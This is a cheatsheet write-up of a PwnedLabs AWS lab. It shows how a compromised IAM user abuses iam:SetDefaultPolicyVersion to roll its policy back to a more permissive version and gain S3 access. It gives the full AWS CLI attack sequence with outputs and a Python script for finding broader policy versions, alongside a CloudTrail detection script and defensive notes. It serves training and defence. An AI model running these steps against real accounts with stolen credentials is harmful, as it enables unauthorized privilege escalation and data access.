Cheatsheet - AWS - Scenario - Utilise IAM policy rollback for Privilege Escalation
Overview
Another quick one - this scenario walks through the dangers of the iam:SetDefaultPolicyVersion permission.
Service/Tool: awscli
Use Case: A compromised principal that holds iam:SetDefaultPolicyVersion on a managed policy attached to it can roll that policy back to an older, more permissive version and escalate its own privileges. Because the default version applies to every user, group and role the policy is attached to, the change is not limited to the attacker's own principal.
Prerequisites: Compromised AWS access key and secret.
Attack Workflow
1. Step 1 (Discovery/Access)
Objective: Conduct recon of the compromised user's attached IAM policies.
Command/Method:
First we check that the compromised credentials are still valid and pull some basic details on the user and account:
aws sts get-caller-identity
{
"UserId": "AIDAVYSUDVBYX2FQMHN3S",
"Account": "396387133553",
"Arn": "arn:aws:iam::396387133553:user/intern01"
}
Great! We can now move on to querying the managed policies attached to this user:
aws iam list-attached-user-policies --user-name intern01
{
"AttachedPolicies": [
{
"PolicyName": "intern_policy",
"PolicyArn": "arn:aws:iam::396387133553:policy/intern_policy"
}
]
}
We can then dig into this policy. First we fetch its metadata, which tells us the current default version, and then we retrieve the policy document for that version:
aws iam get-policy --policy-arn arn:aws:iam::396387133553:policy/intern_policy
{
"Policy": {
"PolicyName": "intern_policy",
"PolicyId": "ANPAVYSUDVBYVNYRQZVBJ",
"Arn": "arn:aws:iam::396387133553:policy/intern_policy",
"Path": "/",
"DefaultVersionId": "v2",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Initial IAM policy version",
"CreateDate": "2025-01-02T10:37:29+00:00",
"UpdateDate": "2025-01-02T10:37:29+00:00",
"Tags": []
}
}
aws iam get-policy-version --policy-arn arn:aws:iam::396387133553:policy/intern_policy --version-id v2
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "internpolicy",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetUserPolicy",
"iam:ListAttachedUserPolicies",
"iam:SetDefaultPolicyVersion"
],
"Resource": [
"arn:aws:iam::*:user/intern01",
"arn:aws:iam::*:policy/intern_policy"
]
}
]
},
"VersionId": "v2",
"IsDefaultVersion": true,
"CreateDate": "2025-01-02T10:37:29+00:00"
}
}
Here we can see that our user is allowed to perform iam:SetDefaultPolicyVersion on intern_policy, which lets us choose which of the stored versions of the policy is the active (default) one. The default is currently v2, so an earlier version v1 must exist; the iam:ListPolicyVersions permission in the same statement would let us enumerate every stored version (IAM keeps at most five per managed policy), but here we simply pull v1 to see whether it is more permissive:
aws iam get-policy-version --policy-arn arn:aws:iam::396387133553:policy/intern_policy --version-id v1
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"ec2:DescribeInstances",
"s3:ListAllMyBuckets",
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2025-01-02T10:37:29+00:00"
}
}
Here we can see that version 1 grants S3 actions (s3:ListAllMyBuckets, s3:ListBucket and s3:GetObject) on Resource "*", none of which the current default v2 allows. That is the version we want active.
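Eyeballing one version works for a two-version policy, but a policy can carry up to five, and the interesting grants may be scattered across them. The following is an added Python example (not part of the original page or the lab) that takes the policy documents for every stored version, as returned by get-policy-version, and reports which non-default versions grant (action, resource) pairs the default does not already cover. The sample documents are the v1 and v2 documents shown above; the function names and the wildcard matching are this example's own assumptions. With boto3 you would feed it the documents returned by iam.list_policy_versions and iam.get_policy_version.

```python
"""Find IAM managed-policy versions more permissive than the current default.

Added example: compares Allow grants across stored policy versions so an
attacker (or an auditor) can see which rollback target adds permissions.
"""
import fnmatch

# Constructed from the two intern_policy documents shown on this page.
INTERN_POLICY_VERSIONS = {
    "v2": {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "internpolicy",
            "Effect": "Allow",
            "Action": [
                "ec2:DescribeInstances", "iam:GetPolicyVersion", "iam:GetPolicy",
                "iam:ListPolicyVersions", "iam:GetUserPolicy",
                "iam:ListAttachedUserPolicies", "iam:SetDefaultPolicyVersion",
            ],
            "Resource": [
                "arn:aws:iam::*:user/intern01",
                "arn:aws:iam::*:policy/intern_policy",
            ],
        }],
    },
    "v1": {
        "Version": "2012-10-17",
        "Statement": [{
            "Action": ["ec2:DescribeInstances", "s3:ListAllMyBuckets",
                       "s3:GetObject", "s3:ListBucket"],
            "Effect": "Allow",
            "Resource": "*",
        }],
    },
}
DEFAULT_VERSION_ID = "v2"


def _as_list(value):
    """IAM accepts a bare string or a list for Statement/Action/Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def allow_grants(document):
    """Return the set of (action, resource) pairs granted by Allow statements.

    Deny statements and Condition blocks are deliberately ignored: for triage
    we want an upper bound on what a version adds, not a full evaluation.
    Action names are lower-cased because IAM matches them case-insensitively.
    """
    grants = set()
    for stmt in _as_list(document.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action")):
            for resource in _as_list(stmt.get("Resource")):
                grants.add((action.lower(), resource))
    return grants


def covered_by(grant, baseline):
    """True if some (possibly wildcarded) baseline grant already covers this one."""
    action, resource = grant
    return any(fnmatch.fnmatchcase(action, base_action)
               and fnmatch.fnmatchcase(resource, base_resource)
               for base_action, base_resource in baseline)


def extra_grants(versions, default_version_id):
    """Map each non-default version id to the sorted grants it adds over the default."""
    baseline = allow_grants(versions[default_version_id])
    findings = {}
    for version_id, document in versions.items():
        if version_id == default_version_id:
            continue
        added = {g for g in allow_grants(document) if not covered_by(g, baseline)}
        if added:
            findings[version_id] = sorted(added)
    return findings


if __name__ == "__main__":
    for version_id, grants in extra_grants(INTERN_POLICY_VERSIONS, DEFAULT_VERSION_ID).items():
        print(f"{version_id} adds over {DEFAULT_VERSION_ID}:")
        for action, resource in grants:
            print(f"  {action} on {resource}")
```

Run against the page's two versions it reports v1 as adding the three S3 actions on "*" (plus ec2:DescribeInstances on "*" rather than on the two scoped ARNs). Note that a version which only looks broader may still be constrained by a Condition or by a permissions boundary, so treat the output as a shortlist to verify, not as proof.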
2. Step 2 (Privilege escalation by rolling back the IAM policy)
Objective: Utilise the AWS CLI to set the IAM policy to a previous version.
Command/Method:
This is as simple as running the following command:
aws iam set-default-policy-version --policy-arn arn:aws:iam::396387133553:policy/intern_policy --version-id v1
We can now confirm that the S3 permissions from v1 are in effect by listing the buckets in the account:
aws s3 ls
2025-01-02 20:37:30 huge-logistics-data-4246a217f499
Nice!
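On the defensive side, the rollback itself is the signal: the call is recorded in CloudTrail as a SetDefaultPolicyVersion event from iam.amazonaws.com, with the policy ARN and the chosen version in requestParameters. The following added Python example (not from the page or the lab) walks a batch of CloudTrail records in time order and flags calls that select a lower version number than the one previously in effect, that come from a principal the policy is attached to, or that were denied. The records, the attachment inventory and the exact field layout are constructed for the example, modelled on the real record format; a production version would build the attachment map from list-attached-user-policies or list-entities-for-policy rather than hard-coding it.

```python
"""Detect IAM policy rollbacks in CloudTrail records.

Added example: walks SetDefaultPolicyVersion events in time order and scores
the ones that look like the privilege escalation on this page.
"""
import json

POLICY_ARN = "arn:aws:iam::396387133553:policy/intern_policy"

# Constructed CloudTrail-style records (not real captures): an admin setting
# v2, intern01 rolling back to v1, the intern's follow-up S3 listing, and a
# later denied attempt by another user.
SAMPLE_RECORDS = [
    {"eventTime": "2025-01-02T10:37:29Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"type": "IAMUser", "userName": "iam-admin"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}},
    {"eventTime": "2025-01-02T20:36:58Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"type": "IAMUser", "userName": "intern01"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v1"}},
    {"eventTime": "2025-01-02T20:37:30Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"type": "IAMUser", "userName": "intern01"},
     "requestParameters": None},
    {"eventTime": "2025-01-03T08:15:02Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "errorCode": "AccessDenied",
     "userIdentity": {"type": "IAMUser", "userName": "contractor02"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v1"}},
]

# Constructed inventory of user -> attached managed policies (intern01's entry
# matches the list-attached-user-policies output on this page).
ATTACHMENTS = {"intern01": {POLICY_ARN}}


def load_records(path):
    """Read a CloudTrail log file, which wraps the events in {"Records": [...]}."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)["Records"]


def version_number(version_id):
    """IAM version ids are 'v<n>'; return n so versions can be ordered."""
    return int(version_id[1:])


def analyse(records, attachments):
    """Return one finding per SetDefaultPolicyVersion call, in time order.

    Keeps the last successfully set version per policy so that a later call
    picking a lower number is reported as a rollback. The first successful
    call seen for a policy is treated as the baseline.
    """
    findings = []
    current_default = {}
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        if (rec.get("eventSource") != "iam.amazonaws.com"
                or rec.get("eventName") != "SetDefaultPolicyVersion"):
            continue
        params = rec.get("requestParameters") or {}
        policy = params.get("policyArn")
        version = params.get("versionId")
        user = rec.get("userIdentity", {}).get("userName")
        reasons = []
        if rec.get("errorCode"):
            reasons.append(f"denied attempt ({rec['errorCode']})")
        if policy in attachments.get(user, set()):
            reasons.append("caller changed a policy attached to itself")
        previous = current_default.get(policy)
        if previous and version_number(version) < version_number(previous):
            reasons.append(f"rollback {previous} -> {version}")
        if not rec.get("errorCode"):
            current_default[policy] = version
        findings.append({
            "time": rec["eventTime"], "user": user, "policy": policy,
            "version": version, "reasons": reasons,
            "severity": "high" if reasons else "info",
        })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_RECORDS, ATTACHMENTS):
        print(f"{f['time']} {f['severity']:4} {f['user']} -> {f['version']} "
              f"{'; '.join(f['reasons']) or 'no indicators'}")
```

The self-modification check is the one that matters most for this scenario: a principal changing the default version of a policy that governs its own permissions has no legitimate reason to do so outside of an administrative workflow, so it deserves an alert regardless of version direction. Denied attempts are kept because a failed call still shows that someone with the credentials was probing for this path.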
Notes and References
Notes:
iam:SetDefaultPolicyVersion creates nothing new; it only selects which of the stored versions (IAM keeps up to five per managed policy) is in effect, and it does so for every user, group and role the policy is attached to, so the rollback is visible to anyone auditing those principals.
IAM changes are eventually consistent, so the new permissions can take a few seconds to apply; if the first S3 call is denied, wait and retry before assuming the rollback failed.
The call is logged in CloudTrail as a SetDefaultPolicyVersion event from iam.amazonaws.com, including the policy ARN and version id, which makes it a simple detection.
Links:
[PwnedLabs - Priv esc via IAM roll backs](https://pwnedlabs.io/labs/escalate-privileges-by-iam-policy-rollback)